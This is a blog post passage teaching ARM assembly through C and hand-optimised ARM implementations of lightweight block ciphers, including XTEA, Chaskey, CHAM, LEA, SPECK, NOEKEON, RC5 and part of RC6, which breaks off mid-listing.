Shellcode: Encryption Algorithms in ARM Assembly

Introduction

There are 2 CPU architectures currently dominating the embedded market, and are almost certain to dominate IoT technologies deployed with 5G over the coming 10-15 years.

Those architectures are Advanced RISC Machine (ARM), and Argonaut RISC Core (ARC).

Although different products, ARC is something we’ll learn more about as 5G is deployed, and I hope to discuss this architecture in future, because this post is about ARM assembly.

This isn’t a tutorial on ARM assembly, but I thought sharing the code, in addition to explaining how operations were implemented would be helpful to others learning ARM.

This post is intended for beginners, but does assume you have a basic grasp of C or similar language. Knowledge of another assembly language would be an advantage, but if you’re already familiar with C, you’ll understand what the assembly is doing based on comments.

A number of cryptographic primitives suitable for resource constrained environments were implemented in C. The assembly output generated by the GNU C compiler was then examined to determine the best implementation possible.

Finally, ARM assembly was written by hand in order to reduce space further. If you’re new to the ARM architecture, and want to learn assembly, the information here may be of some use to you.

A good resource for those new to ARM assembly

Generating assembly

Learning any assembly language can be a tedious and challenging task for many of us. Lack of knowledge in another assembly language will also impede progress, but if you persevere over time, eventually you’ll reap the rewards, and will be reading assembly like you’re reading a newspaper. 😉

My approach to learning assembly involves obtaining instruction set or programmer manuals, obtaining a C compiler that will generate assembly for the target architecture, and sometimes examining existing source code written by other people, as this can be invaluable to learning new tricks.

Implement your program in C, and have the compiler generate the assembly. Then study the code, and learn what it does.

  • Optimization Flags

To generate assembly of a C file, you can use the -S switch. You may also want to generate compact code using -O2 and -Os

The Microsoft compiler for ARM provides similar switches, including /FAs which generates an assembly file with source code included.

Personally, I’d never try to optimize assembly for speed, since compilers are usually already good at this, but there are definitely situations when the assembly generated by compiler is inefficient.

  • Debugging symbols

If we want to include symbols from the original C code to help us understand what each assembly operation does, we can use the -g switch which will include debugging symbols.

To then produce disassembly with those symbols included, use objdump -d -S source.o which tells the program to disassemble with source.

ARM Directives

The GNU Assembler provides a number of directives which can be useful and save you from pulling your hair out and crying over your keyboard.

A more comprehensive list can be viewed here, as I only include what I think are useful to prevent writing buggy code.

  • CPU

.arm indicates 32-bit code, .thumb indicates 16-bit code.

The 2 are essentially the same as using .code 32 or .code 16

All the code used here is 32-bit.

  • Architecture

It’s completely optional, but the .arch directive tells the assembler what instruction set our program should use.

ARMv6 should be fine, since Raspberry Pis run on these.

Using .arch armv6 should prevent using instructions not part of ARMv6.

If you accidently attempt to use some instruction unavailable to the target architecture, the assembler will display an error. Better to use this than to assemble some code into a binary, execute and watch it segfault.

  • Alignment

The .align directive ensures your code is properly aligned.

Of course, depending on what you’re writing, you may not want your code padded with null bytes.

If that’s the case, you might want to manually align using a simple NOP instruction at the end of file somewhere.

  • Exporting Functions

The .global directive will allow a function to be accessed from another source file.

  • Symbolic names

It could be considered bad practice in the eyes of some hardcore assembly programmers, but redefining registers just makes my life much easier. I sleep reasonably well at night if I used symbolic names during the day to complete a bit of code.

As some of you know, we define symbolic constants in C using the #define keyword which allows us to substitute one value for another.

In the NASM and YASM assemblers, those of you familiar with x86 or AMD64 assembly will likely have encountered the %define keyword which is essentially the same thing.

The .req directive allows us to assign our own names to registers.

I recommend using symbolic names where possible to reduce the potential for error…you can thank me later.

ARM instructions

Every instruction supports suffixes that can affect or depend on the flags register.

A SUB for subtraction can be implemented as SUBS which sets the flags based on result of subtraction.

A suffix like NE (Not Equal) or EQ (Equal) can also be added which determines whether the subtraction is executed or not.

Multiple loads with LDM (Load Multiple) and multiple stores with STM (Store Multiple) are not commonly used by compilers, but used throughout examples shown here.

Block Ciphers

Lightweight block ciphers are popular among developers of embedded systems. They can be used with Counter (CTR) Mode to implement a stream cipher.

What I illustrate here should not be interpreted as an endorsement. I do not claim these ciphers are without weaknesses, or that you should be using them in your project.

  • XTEA

TEA Extensions (XTEA) is a 64-bit block cipher with support for 128-bit keys. It was published in 1998 as a response to weaknesses found in the Tiny Encryption Algorithm (TEA)

XTEA compared to its predecessor contains a more complex key-schedule and rearrangement of shifts, XORs, and additions.

// uses 32 rounds by default
void xtea_encrypt(void *key, void *data) {
    int      i;
    uint32_t x0, x1, t, sum=0;
    
    uint32_t *k=(uint32_t*)key;
    uint32_t *x=(uint32_t*)data;
    
    // load 64-bit plain text
    x0 = x[0]; x1 = x[1];
    
    for (i=64; i>0; i--) {
      t = sum;
      // add constant every 2nd round
      if (i & 1) {
        sum += 0x9E3779B9;
        t = sum >> 11;          
      }
      x0 += ((((x1 << 4) ^ 
        (x1 >> 5)) + x1) ^ 
        (sum + k[t & 3]));
         
      XCHG(x0, x1);
    }
    // save 64-bit cipher text
    x[0] = x0; x[1] = x1;
}

The ARM code makes use of conditional execution in order to avoid branching. In x86 code, the if statement requires a conditional jump, but thanks to ARM conditional suffixes, the Addition and Left Shift are only executed every 2nd step.

// key
k   .req r0
x   .req r1

// data
x0  .req r2
x1  .req r3

sum .req r4
t0  .req r5
t1  .req r6
c   .req r7
i   .req r8

  // xtea_encryptx(void *key, void *data);
xtea_encryptx:
  // saxe registers
  push  {r0-r12, lr}

  // 32 rounds by default
  mov   i, #64               // number of rounds

  // load 64-bit plain text
  ldm   x, {x0, x1}          // x0  = x[0], x1 = x[1];
  mov   sum, #0              // sum = 0;
  ldr   c, =#0x9E3779B9      // c   = 0x9E3779B9;
xtea_loop:
  mov   t0, sum              // t0 = sum;
  tst   i, #1                // if (i & 1)

  // the next 2 only execute if (i % 2) is not zero
  addne sum, c               // sum += 0x9E3779B9;
  lsrne t0, sum, #11         // t0 = sum >> 11

  and   t0, #3               // t0 %= 4
  ldr   t0, [k, t0, lsl #2]  // t0 = k[t0];
  add   t1, sum, t0          // t1 = sum + t0
  mov   t0, x1, lsl #4       // t0 = (x1 << 4)
  eor   t0, x1, lsr #5       // t0^= (x1 >> 5)
  add   t0, x1               // t0+= x1
  eor   t0, t1               // t0^= t1
  mov   t1, x1               // backup x1
  add   x1, t0, x0           // x1 = t0 + x0

  // XCHG(x0, x1)
  mov   x0, t1               // x0 = x1
  subs  i, i, #1             // i--
  bne   xtea_loop            // i>0

  // save 64-bit cipher text
  stm   x, {x0, x1}

  // restore registers
  pop   {r0-r12, pc}
  • CHASKEY

The Chaskey cipher is a 128-bit block, 128-bit key symmetric encryption algorithm which is the underlying function used for the Chaskey Message Authentication Code (MAC).

It’s based on an Even-Mansour construction which makes it very simple to implement. The permutation function was derived from SipHash, and uses only ARX instructions making it highly suitable for 32-bit architectures.

void chas_encryptx(void *key, void *data)
{
   int      i;
   uint32_t *x=(uint32_t*)data;
   uint32_t *k=(uint32_t*)key;

   // mix key
   for (i=0; i<4; i++) x[i] ^= k[i];

   // apply permutation
   for (i=16; i>0; i--) {
     x[0] += x[1];
     x[1]=ROTR32(x[1],27) ^ x[0];
     x[2] += x[3];
     x[3]=ROTR32(x[3],24) ^ x[2];
     x[2] += x[1];
     x[0]=ROTR32(x[0],16) + x[3];
     x[3]=ROTR32(x[3],19) ^ x[0];
     x[1]=ROTR32(x[1],25) ^ x[2];
     x[2]=ROTR32(x[2],16);
   }
   // mix key
   for (i=0; i<4; i++) x[i] ^= k[i];
}

Not much to say about implementation.

k  .req r0
x  .req r1

k0 .req r2
k1 .req r3
k2 .req r4
k3 .req r5

x0 .req r6
x1 .req r7
x2 .req r8
x3 .req r9

i  .req r10
  
  // chas_encryptx(void *key, void *data);
chas_encryptx:
  
  // saxe registers
  push   {r0-r12,lr}
  
  // load 128-bit key
  ldm    k, {k0, k1, k2, k3}
  
  // load 128-bit plain text
  ldm    x, {x0, x1, x2, x3}
  
  // xor plaintext with key
  eor    x0, k0              // x[0] ^= k[0];
  eor    x1, k1              // x[1] ^= k[1];
  eor    x2, k2              // x[2] ^= k[2];
  eor    x3, k3              // x[3] ^= k[3];
  mov    i, #16              // i = 16
chaskey_loop:
  add    x0, x1              // x[0] += x[1];
  eor    x1, x0, x1, ror #27 // x[1]=ROTR32(x[1],27) ^ x[0];
  add    x2, x3              // x[2] += x[3];
  eor    x3, x2, x3, ror #24 // x[3]=ROTR32(x[3],24) ^ x[2];
  add    x2, x1              // x[2] += x[1];
  add    x0, x3, x0, ror #16 // x[0]=ROTR32(x[0],16) + x[3];
  eor    x3, x0, x3, ror #19 // x[3]=ROTR32(x[3],19) ^ x[0];
  eor    x1, x2, x1, ror #25 // x[1]=ROTR32(x[1],25) ^ x[2];
  ror    x2, #16             // x[2]=ROTR32(x[2],16);
  subs   i, i, #1            // i--
  bne    chaskey_loop        // i>0
  
  // xor cipher text with key
  eor    x0, k0              // x[0] ^= k[0];
  eor    x1, k1              // x[1] ^= k[1];
  eor    x2, k2              // x[2] ^= k[2];
  eor    x3, k3              // x[3] ^= k[3];
  
  // save 128-bit cipher text
  stm    x, {x0, x1, x2, x3}
  
  // restore registers, and return
  pop    {r0-r12,pc}
  • CHAM

CHAM: A Family of Lightweight Block Ciphers for Resource-Constrained Devices was published in December 2017 at the 20th Annual International Conference on Information Security and Cryptology held in South Korea.

// initialize sub keys
void cham128_setkey(void *in, void *out)
{
    int i;
    uint32_t *k=(uint32_t*)in;
    uint32_t *rk=(uint32_t*)out;

    for (i=0; i<KW; i++) {
      rk[i] = k[i] ^ ROTL32(k[i], 1) ^ ROTL32(k[i], 8);
      rk[(i + KW) ^ 1] = k[i] ^ ROTL32(k[i], 1) ^ ROTL32(k[i], 11);
    }
}

// encrypt 128-bits
void cham128_encrypt(void *keys, void *data)
{
    int i;
    uint32_t x0, x1, x2, x3;
    uint32_t t;
    uint32_t *rk=(uint32_t*)keys;
    uint32_t *x=(uint32_t*)data;

    x0 = x[0]; x1 = x[1];
    x2 = x[2]; x3 = x[3];

    for (i=0; i<R; i++)
    {
      if (i & 1) {
        x0 = ROTL32((x0 ^ i) + (ROTL32(x1, 8) ^ rk[i & 7]), 1);
      } else {
        x0 = ROTL32((x0 ^ i) + (ROTL32(x1, 1) ^ rk[i & 7]), 8);
      }
      XCHG(x0, x1);
      XCHG(x1, x2);
      XCHG(x2, x3);
    }
    x[0] = x0; x[1] = x1;
    x[2] = x2; x[3] = x3;
}

Makes use of conditional execution to avoid branching. The TST instruction will perform if (i % 2)

EOR and ROR are then executed based on the result of this.

k   .req r0
x   .req r1

// data
x0 .req r0
x1 .req r2
x2 .req r3
x3 .req r4  

// round keys  
rk .req sp

k0 .req r6
k1 .req r7
k2 .req r8

i  .req r10

cham128_encryptx:
  // save registers
  push   {r0-r12,lr}
  
  // allocate memory for round keys
  sub    sp, #32
  
  // derive round keys from 128-bit key
  mov    i, #0                 // i  = 0
cham_init:  
  ldr    k0, [k, i, lsl #2]    // k0 = k[i];  
  ror    k1, k0, #31           // k1 = ROTR32(k0, 31);
  ror    k2, k0, #24           // k2 = ROTR32(k0, 24);  
  eor    k0, k1                // k0^= k1;
  eor    k1, k0, k2            // rk[i] = k0 ^ k2; 
  str    k1, [rk, i, lsl #2]  
  eor    k0, k2, ror #29       // k0 ^= ROTR32(k2, 29);
  add    k1, i, #4             // k1 = (i+KW)
  eor    k1, #1                // k1 = (i+KW) ^ 1 
  str    k0, [rk, k1, lsl #2]  // rk[(i+KW)^1] = k0;  
  add    i, #1                 // i++
  cmp    i, #4                 // i<KW  
  bne    cham_init             //  
  
  // load 128-bit plain text
  ldm    x, {x0, x1, x2, x3}
  
  // perform encryption
  mov    i, #0                 // i = 0 
cham_enc:
  mov    k0, x3
  eor    x0, i                 // x0 ^= i
  tst    i, #1                 // if (i & 1)  
  
  // x3  = rk[i & 7];    
  and    k1, i, #7             // k1 = i & 7;
  ldr    x3, [rk, k1, lsl #2]  // x3 = rk[i & 7];  
  
  // execution depends on (i % 2)
  // x3 ^= (i & 1) ? ROTR32(x1, 24) : ROTR32(x1, 31);
  eorne  x3, x1, ror #24       // 
  eoreq  x3, x1, ror #31       // 
  
  add    x3, x0                // x3 += x0;
  
  // x3 = (i & 1) ? ROTR32(x3, 31) : ROTR32(x3, 24);
  rorne  x3, #31               // x3 = ROTR32(x3, 31); 
  roreq  x3, #24               // x3 = ROTR32(x3, 24);
  
  // swap
  mov    x0, x1                // x0 = x1; 
  mov    x1, x2                // x1 = x2;
  mov    x2, k0                // x2 = k0;

  add    i, #1                 // i++;  
  cmp    i, #80                // i<R 
  bne    cham_enc              // 
  
  // save 128-bit cipher text
  stm    x, {x0, x1, x2, x3}   // x[0] = x0; x[1] = x1; 
                               // x[2] = x2; x[3] = x3;
  // release memory for round keys
  add    sp, #32
                                                              
  // restore registers
  pop    {r0-r12, pc}
  • LEA

LEA is a 128-bit block cipher with support for 128, 192 and 256-bit keys published in 2014.

The only operations used for encryption and the key schedule are 32-bit Addition, eXclusive OR and Rotation (ARX structure): the designers state “the usage of 32-bit and 64-bit processors will grow rapidly compared to 8-bit and 16-bit ones

void lea128_encryptx(void *key, void *data) {
    uint32_t k0, k1, k2, k3;
    uint32_t x0, x1, x2, x3;
    uint32_t c0, c1, c2, c3;
    
    uint32_t *x, *k, r, t0;

    x = (uint32_t*)data;
    k = (uint32_t*)key;

    // initialize 32-bit constants
    c0 = 0xc3efe9db; c1 = 0x88c4d604;
    c2 = 0xe789f229; c3 = 0xc6f98763;

    // load 128-bit key
    k0 = k[0]; k1 = k[1];
    k2 = k[2]; k3 = k[3];

    // load 128-bit plain text
    x0 = x[0]; x1 = x[1];
    x2 = x[2]; x3 = x[3];

    // perform encryption
    for (r=24; r>0; r--) {
      // create subkey
      k0 = ROTR32(k0 + c0, 31);
      k1 = ROTR32(k1 + ROTR32(c0, 31), 29);
      k2 = ROTR32(k2 + ROTR32(c0, 30), 26);
      k3 = ROTR32(k3 + ROTR32(c0, 29), 21);
      
      // encrypt block
      t0 = x0;
      x0 = ROTR32((x0 ^ k0) + (x1 ^ k1),23);
      x1 = ROTR32((x1 ^ k2) + (x2 ^ k1), 5);
      x2 = ROTR32((x2 ^ k3) + (x3 ^ k1), 3);
      x3 = t0;
      
      // update constants
      t0 = c0; c0 = c1; c1 = c2; c2 = c3;
      c3 = ROTR32(t0, 28);
    }
    // save 128-bit cipher text
    x[0] = x0; x[1] = x1;
    x[2] = x2; x[3] = x3;
}

Although we could use the stack for constants, 4 registers were used instead. Because almost all general purpose registers are being used, this just about fits onto ARM in 32-bit mode.

k   .req r0
x   .req r1

// key
k0  .req r0
k1  .req r2
k2  .req r3
k3  .req r4 

// data
x0  .req r5
x1  .req r6
x2  .req r7
x3  .req r8

// constants
g0  .req r9
g1  .req r10
g2  .req r11
g3  .req r12
 
// counter
r   .req r1
 
lea128_encryptx:
  // save registers
  push   {r0-r12, lr}
  
  ldr    g0, =#0xc3efe9db     // g0 = 0xc3efe9db; 
  ldr    g1, =#0x88c4d604     // g1 = 0x88c4d604; 
  ldr    g2, =#0xe789f229     // g2 = 0xe789f229; 
  ldr    g3, =#0xc6f98763     // g3 = 0xc6f98763; 
  
  // load 128-bit key
  ldm    k, {k0, k1, k2, k3}  

  // load 128-bit plain text
  push   {x}
  ldm    x, {x0, x1, x2, x3}  
  
  // perform encryption  
  mov    r, #24               // r = 24  
lea_main:
  push   {r}

  // create subkey
  // k0 = ROTR32(k0 + g0, 31);
  add     k0, g0
  ror     k0, #31
  
  // k1 = ROTR32(k1 + ROTR32(g0, 31), 29);
  add     k1, g0, ror #31
  ror     k1, #29
  
  // k2 = ROTR32(k2 + ROTR32(g0, 30), 26);
  add     k2, g0, ror #30
  ror     k2, #26
  
  // k3 = ROTR32(k3 + ROTR32(g0, 29), 21);
  add     k3, g0, ror #29
  ror     k3, #21
  
  // encrypt block  
  // t0 = x0;
  push   {x0}
  
  // x0 = ROTR32((x0 ^ k0) + (x1 ^ k1),23);
  eor    r1, x1, k1
  eor    x0, k0
  add    x0, r1
  ror    x0, #23
  
  // x1 = ROTR32((x1 ^ k2) + (x2 ^ k1), 5);
  eor    r1, x2, k1
  eor    x1, k2
  add    x1, r1
  ror    x1, #5
  
  // x2 = ROTR32((x2 ^ k3) + (x3 ^ k1), 3);
  eor    r1, x3, k1
  eor    x2, k3
  add    x2, r1
  ror    x2, #3
  
  // x3 = t0;
  pop    {x3}
  
  // update constants
  push   {g0}
  mov    g0, g1
  mov    g1, g2
  mov    g2, g3
  
  // g3 = ROTR32(t0, 28);
  pop    {g3}
  ror    g3, #28
  
  pop    {r}
  subs   r, #1             // r--
  bne    lea_main          // r>0
  
  // save 128-bit cipher text
  pop    {x}
  stm    x, {x0, x1, x2, x3}
  
  // restore registers
  pop    {r0-r12, pc}
  • SPECK

SPECK is a family of lightweight block ciphers publicly released by the National Security Agency (NSA) in June 2013. It’s an ARX (add-rotate-xor) design optimized for performance in software implementations, and has been suggested for use on resource constrained devices.

void speck64_encryptx(const void *key, void *data)
{
    uint32_t i, t, k0, k1, k2, k3, x0, x1;
    uint32_t *k=(uint32_t*)key;
    uint32_t *x=(uint32_t*)data;
    
    // copy 128-bit key to local space
    k0 = k[0]; k1 = k[1];
    k2 = k[2]; k3 = k[3];
    
    // copy input to local space
    x0 = x[0]; x1 = x[1];
    
    for (i=0; i<27; i++)
    {
      // encrypt block
      x0 = (ROTR32(x0, 8) + x1) ^ k0;
      x1 =  ROTL32(x1, 3) ^ x0;
      
      // create next sub key
      t  = k3;
      k3 = (ROTR32(k1, 8) + k0) ^ i;
      k0 =  ROTL32(k0, 3) ^ k3;
      
      k1 = k2;
      k2 = t;   
    }
    // save result
    x[0] = x0; x[1] = x1;
}

Straight forward implementation with no trickery required.

// key
k0 .req r2
k1 .req r3
k2 .req r4
k3 .req r5

// plaintext
x0 .req r6
x1 .req r7

// parameters
k  .req r0
x  .req r1
i  .req r0
t  .req r8

  // speck64_encryptx(void *key, void *data);
speck64_encryptx:
  // save registers
  push   {r0-r12, lr}
  
  // load 128-bit key
  // k0 = k[0]; k1 = k[1]; k2 = k[2]; k3 = k[3];
  ldm    k, {k0, k1, k2, k3}
  // load 64-bit plain text
  ldm    x, {x0, x1}          // x0 = x[0]; x1 = k[1];
  mov    i, #0                // i=0
speck_loop:
  add    x0, x1, x0, ror #8   // x0 = (ROTR32(x0, 8) + x1) ^ k0;
  eor    x0, k0               //
  eor    x1, x0, x1, ror #29  // x1 = ROTL32(x1, 3) ^ x0;
  mov    t, k3                // backup k3
  add    k3, k0, k1, ror #8   // k3 = (ROTR32(k1, 8) + k0) ^ i;
  eor    k3, i                //
  eor    k0, k3, k0, ror #29  // k0 = ROTL32(k0, 3) ^ k3;
  mov    k1, k2               // k1 = k2;
  mov    k2, t                // k2 = t;
  add    i, #1                // i++;
  cmp    i, #27               // i<27;
  bne    speck_loop
  
  // save result
  stm    x, {x0, x1}          // x[0] = x0; x[1] = x1;
  
  // restore registers
  pop    {r0-r12, pc}
  • NOEKEON

NOEKEON is a 128-bit block cipher submitted to the NESSIE project in September 2000.

void Noekeonx(void *key, void *data) {
    int      i, j;
    uint32_t t;
    w256_t   rc;
    uint32_t *x, *k;

    x = (uint32_t*)data;
    k = (uint32_t*)key;

    // constants
    rc.w[ 0] = 0x6c361b80; rc.w[1] = 0x9a4dabd8;
    rc.w[ 2] = 0x63bc5e2f; rc.w[3] = 0x6a3597c6;
    rc.b[16] = 0xd4;

    for (i=0;;i++) {
      x[0] ^= rc.b[i];
      // Theta
      t = x[0] ^ x[2];
      t ^= ROTR32(t, 8) ^ ROTR32(t, 24);

      x[1] ^= t; x[3] ^= t;

      // mix key
      x[0]^= k[0]; x[1]^= k[1];
      x[2]^= k[2]; x[3]^= k[3];

      t = x[1] ^ x[3];
      t ^= ROTR32(t, 8) ^ ROTR32(t, 24);

      x[0]^= t; x[2] ^= t;

      if (i==Nr) break;

      // Pi1
      x[1] = ROTR32(x[1], 31);
      x[2] = ROTR32(x[2], 27);
      x[3] = ROTR32(x[3], 30);

      // Gamma
      x[1]^= ~((x[3]) | (x[2]));
      x[0]^= x[2] & x[1];

      XCHG(x[0], x[3]);

      x[2]^= x[0] ^ x[1] ^ x[3];
      x[1]^= ~((x[3]) | (x[2]));
      x[0]^= x[2] & x[1];

      // Pi2
      x[1] = ROTR32(x[1], 1);
      x[2] = ROTR32(x[2], 5);
      x[3] = ROTR32(x[3], 2);
    }
}

What’s missing here is code to convert from little to big endian convention.

On x86 is the BSWAP instruction, for ARM, there’s REV

k   .req r0
x   .req r1

// key
k0  .req r2
k1  .req r3
k2  .req r4
k3  .req r5

// data
x0  .req r6
x1  .req r7
x2  .req r8
x3  .req r9

// constants
i   .req r10
t0  .req r11
t1  .req r12

Noekeonx:
  // save registers
  push   {r0-r12, lr}

  // load 128-bit key
  ldm    k, {k0, k1, k2, k3}

  // load 128-bit plain text
  ldm    x, {x0, x1, x2, x3}

  mov    i, #0
noekeon_main:
  adr    t0, rc_tab
  ldrb   t0, [t0, i]

  // x[0] ^= rc.b[i];
  eor    x0, t0

  // Theta
  // t = x[0] ^ x[2];
  // t ^= ROTR32(t, 8) ^ ROTR32(t, 24);
  eor    t0, x0, x2
  mov    t1, t0
  eor    t0, t1, ror #8
  eor    t0, t1, ror #24

  // x[1] ^= t; x[3] ^= t;
  eor    x1, t0
  eor    x3, t0

  // mix key
  // x[0]^= k[0]; x[1]^= k[1];
  // x[2]^= k[2]; x[3]^= k[3];
  eor    x0, k0
  eor    x1, k1
  eor    x2, k2
  eor    x3, k3

  // t = x[1] ^ x[3];
  // t ^= ROTR32(t, 8) ^ ROTR32(t, 24);
  eor    t0, x1, x3
  mov    t1, t0
  eor    t0, t1, ror #8
  eor    t0, t1, ror #24

  // x[0] ^= t; x[2] ^= t;
  eor    x0, t0
  eor    x2, t0

  cmp    i, #16           // if (i==Nr) break;
  beq    noekeon_end

  // Pi1
  ror    x1, #31      // x[1] = ROTR32(x[1], 31);
  ror    x2, #27      // x[2] = ROTR32(x[2], 27);
  ror    x3, #30      // x[3] = ROTR32(x[3], 30);

  // Gamma
  // x[1]^= ~((x[3]) | (x[2]));
  orr    t0, x3, x2
  mvn    t0, t0
  eor    x1, t0

  mov    t1, x3       // backup x3

  // x[0] ^= x[2] & x[1];
  and    t0, x2, x1
  eor    x3, x0, t0

  // XCHG(x[0], x[3]);
  mov    x0, t1

  // x[2]^= x[0] ^ x[1] ^ x[3];
  eor    x2, x0
  eor    x2, x1
  eor    x2, x3

  // x[1]^= ~((x[3]) | (x[2]));
  orr    t0, x3, x2
  mvn    t0, t0
  eor    x1, t0

  // x[0]^= x[2] & x[1];
  and    t0, x2, x1
  eor    x0, t0

  // Pi2
  ror    x1, #1      // x[1] = ROTR32(x[1], 1);
  ror    x2, #5      // x[2] = ROTR32(x[2], 5);
  ror    x3, #2      // x[3] = ROTR32(x[3], 2);

  add    i, #1        // i++
  b      noekeon_main

noekeon_end:
  // save 128-bit cipher text
  stm    x, {x0, x1, x2, x3}

  // restore registers, and return
  pop    {r0-r12, pc}

rc_tab:
	.byte 0x80
	.byte 0x1B, 0x36, 0x6C, 0xD8
	.byte 0xAB, 0x4D, 0x9A, 0x2F
	.byte 0x5E, 0xBC, 0x63, 0xC6
	.byte 0x97, 0x35, 0x6A, 0xD4
  • RC5

RC5 is a symmetric block cipher designed in 1994 by Ronald Rivest. The version shown here uses 128-bit keys, processes 64-bit blocks of data, and uses 12 rounds.

It’s been suggested 20 rounds be used in order to mitigate against a weakness.

void rc5_encryptx(void *key, void *data)
{
    uint32_t A, B, T;
    uint32_t L[4], S[RC5_KR];
    int      i, j, r;

    uint32_t *kp=(uint32_t*)key;
    uint32_t *x=(uint32_t*)data;

    // initialize L with 128-bit key
    memcpy(&L, key, 16);

    A = 0xC983AE2D;

    // initialize S with constants
    for (i=RC5_KR; i>0;) {
      A -= RC5_Q;
      S[--i] = A;
    }

    A = B = 0;
    r = (RC5_KR*3);

    // create sub keys
    for (i=0, j=0; r>0; i++, j++, r--) {
      // i needs reset?
      if (i==RC5_KR) i=0;
      j &= 3;

      A = S[i] = ROTL32(S[i] + A+B, 3);
      B = L[j] = ROTL32(L[j] + A+B, A+B);
    }

    // assign sub keys to k ptr
    kp = S;

    // load 64-bit plain text
    A = x[0] + *kp++;
    B = x[1] + *kp++;

    // apply encryption
    for (i=RC5_ROUNDS*2; i>0; i--) {
      T = B;
      B = ROTL32(A ^ B, B) + *kp++;
      A = T;
    }
    // save 64-bit ciphertext
    x[0] = A; x[1] = B;
}

When initializing 2 registers to zero, instead of 2 separate instructions, we use another register already set to zero with UMULL which is similar to using MUL on x86 with zero to initialize EAX and EDX to zero.

Since ARM doesn’t support a ROL instruction, RSB is used to calculate the value before using ROR.

k  .req r0
x  .req r1

x0 .req r2
x1 .req r3  
  
t0 .req r4
t1 .req r5
t2 .req r6

i  .req r7
j  .req r8
r  .req r9

L  .req r10
S  .req r11
kp .req r11

rc5_encryptx:
  // save registers
  push   {r0-r12, lr}
  
  // allocate memory
  sub    sp, #128
  
  // initialize L with 128-bit key
  // memcpy(&L, key, 16);
  mov    L, sp
  ldm    k, {r2-r5}
  stm    L, {r2-r5}
  
  // initialize S with constants
  ldr    x0, =#0xC983AE2D     // x0 = RC5_P precomputed
  ldr    x1, =#0x9E3779B9     // x1 = RC5_Q
  add    S, sp, #16
  mov    i, #26               // i = RC5_KR, RC5_KR=2*(ROUNDS+1)
init_sub:
  sub    x0, x0, x1           // x0 -= RC5_Q
  subs   i, i, #1             // i--  
  str    x0, [S, i, lsl #2]   // S[i] = x0;  
  bne    init_sub             // i>=0
  
  umull  x0, x1, i, i         // x0 = 0, x1 = 0 
  mov    r, #78               // r = (RC5_KR*3)
  
  // ***********************************************
  // create the round keys
  // ***********************************************    
  mov    j, i                 // j = 0   
rc5_sub:
  cmp    i, #26               // if (i == RC5_KR) i = 0
  moveq  i, #0                // zero if equal
  and    j, #3                // j &= 3

  // x0 = S[i] = ROTL32(S[i] + x0+x1, 3);
  add    x0, x1               // x0 = x0 + x1;
  ldr    t2, [S, i, lsl #2]
  add    x0, t2               // x0 += t2
  ror    x0, #29 
  str    x0, [S, i, lsl #2]   // S[i] = x0
    
  // x1 = L[j] = ROTL32(L[j] + x0+x1, x0+x1);
  add    x1, x0, x1           // x1 = x0 + x1
  rsb    t0, x1, #32          // t0 = 32 - x1  
  ldr    t2, [L, j, lsl #2]
  add    x1, t2               // x1 += t2
  ror    x1, t0               //
  str    x1, [L, j, lsl #2]   // L[j] = x1  
  add    i, #1                // i++   
  add    j, #1                // j++ 
  subs   r, #1                // r--
  bne    rc5_sub
  
  // ***********************************************
  // perform encryption
  // ***********************************************    
  // load plaintext
  ldm    x, {x0, x1}          // x0 = x[0]; x1 = x[1]; 
  
  ldr    t0, [kp], #4
  add    x0, t0               // x0 += *kp++;
  
  ldr    t0, [kp], #4
  add    x1, t0               // x1 += *kp++;
  
  // apply encryption
  mov    i, #24               // i = RC5_KR - 2 
rc5_enc:
  ldr    t0, [kp], #4         // t0 = *kp++;
  eor    x0, x1
  rsb    t1, x1, #32          // t1 = 32 - x1
  mov    t2, x1               // backup x1
  add    x1, t0, x0, ror t1 
  mov    x0, t2
  subs   i, #1                // i--
  bne    rc5_enc              // i>0
  
  // save ciphertext
  stm    x, {x0, x1}          // x[0] = x0; x[1] = x1;
  
  // release memory
  add    sp, #128
  
  // restore registers
  pop    {r0-r12, pc}
  • RC6

RC6 is a symmetric block cipher published in 1998. It was one of the 5 finalists considered for the Advanced Encryption Standard.

The main changes with RC6 are a 128-bit block, and support for 128, 192 and 256-bit keys. The version here will support only 256-bit keys.

The key schedule is essentially the same, but obviously working with 256-bit keys. The encryption includes additional operations and specifically a multiplication.

void rc6_encryptx (void *key, void *data)
{
    uint32_t x0, x1, x2, x3, t0, t1, t2;
    uint32_t L[8], S[RC6_KR];
    uint32_t *x, *kp;
    int      i, j, r;

    x=(uint32_t*)data;

    // initialize L with 256-bit key
    memcpy(&L, key, 32);

    x0 = 0xE96A3D2F;

    // initialize S with constants
    for (i=RC6_KR; i>0;) {
      x0 -= RC6_Q;
      S[--i] = x0;
    }

    x0 = x1 = 0;
    r = (RC6_KR*3);

    // create sub keys
    for (i=0, j=0; r>0; i++, j++, r--) {
      // i needs reset?
      if (i==RC6_KR) i=0;
      j &= 7;

      x0 = S[i] = ROTL32(S[i] + x0+x1, 3);
      x1 = L[j] = ROTL32(L[j] + x0+x1, x0+x1);
    }

    // assign sub keys to k
    kp = S;

    // load plain text
    x0 = x[0]; x1 = x[1] + *kp++;
    x2 = x[2]; x3 = x[3] + *kp++;

    // apply encryption
    for (i=RC6_ROUNDS; i>0; i--) {
      t0 = ROTL32(x1 * (x1 + x1 + 1), 5);
      t1 = ROTL32(x3 * (x3 + x3 + 1), 5);

      t2 = x3; // backup x3

      x0 ^= t0;
      x2 ^= t1;
      x3 = ROTL32(x0, t1);
      t1 = *kp++;
      x3 += t1;

      x0 = x1; // move x1 into x0
      x1 = ROTL32(x2, t0);
      t0 = *kp++;
      x1 += t0;

      x2 = t2;  // move x3 into x2
    }
    // save cipher text
    x[0] = x0 + kp[0]; x[1] = x1;
    x[2] = x2 + kp[1]; x[3] = x3;
}

I considered using a multiplication for the division, but a conditional test is perfect, especially on ARM with its conditional execution feature.

k  .req r0
x  .req r1

x0 .req r0
x1 .req r2
x2 .req r3
x3 .req r4  
  
t0 .req r5
t1 .req r6
t2 .req r7

i  .req r8
j  .req r9
r  .req r10

L  .req r11
S  .req r12
kp .req r12

  // rc6_encryptx(void *key, void *data);
rc6_encryptx:
  // save registers
  push   {r0-r12, lr}
  
  // allocate memory
  sub    sp, #256
  
  // initialize L with 256-bit key
  // memcpy(&L, key, 32);
  mov    L, sp
  ldm    k, {r2-r9}
  stm    L, {r2-r9}
  
  // initialize S with constants
  ldr    x0, =#0xE96A3D2F     // x0 = RC6_P precomputed
  ldr    x1, =#0x9E3779B9     // x1 = RC6_Q
  add    S, sp, #32
  mov    i, #44               // i = RC6_KR, RC6_KR=2*(ROUNDS+2)
init_sub:
  sub    x0, x1               // x0 -= RC6_Q
  subs   i, #1                // --i  
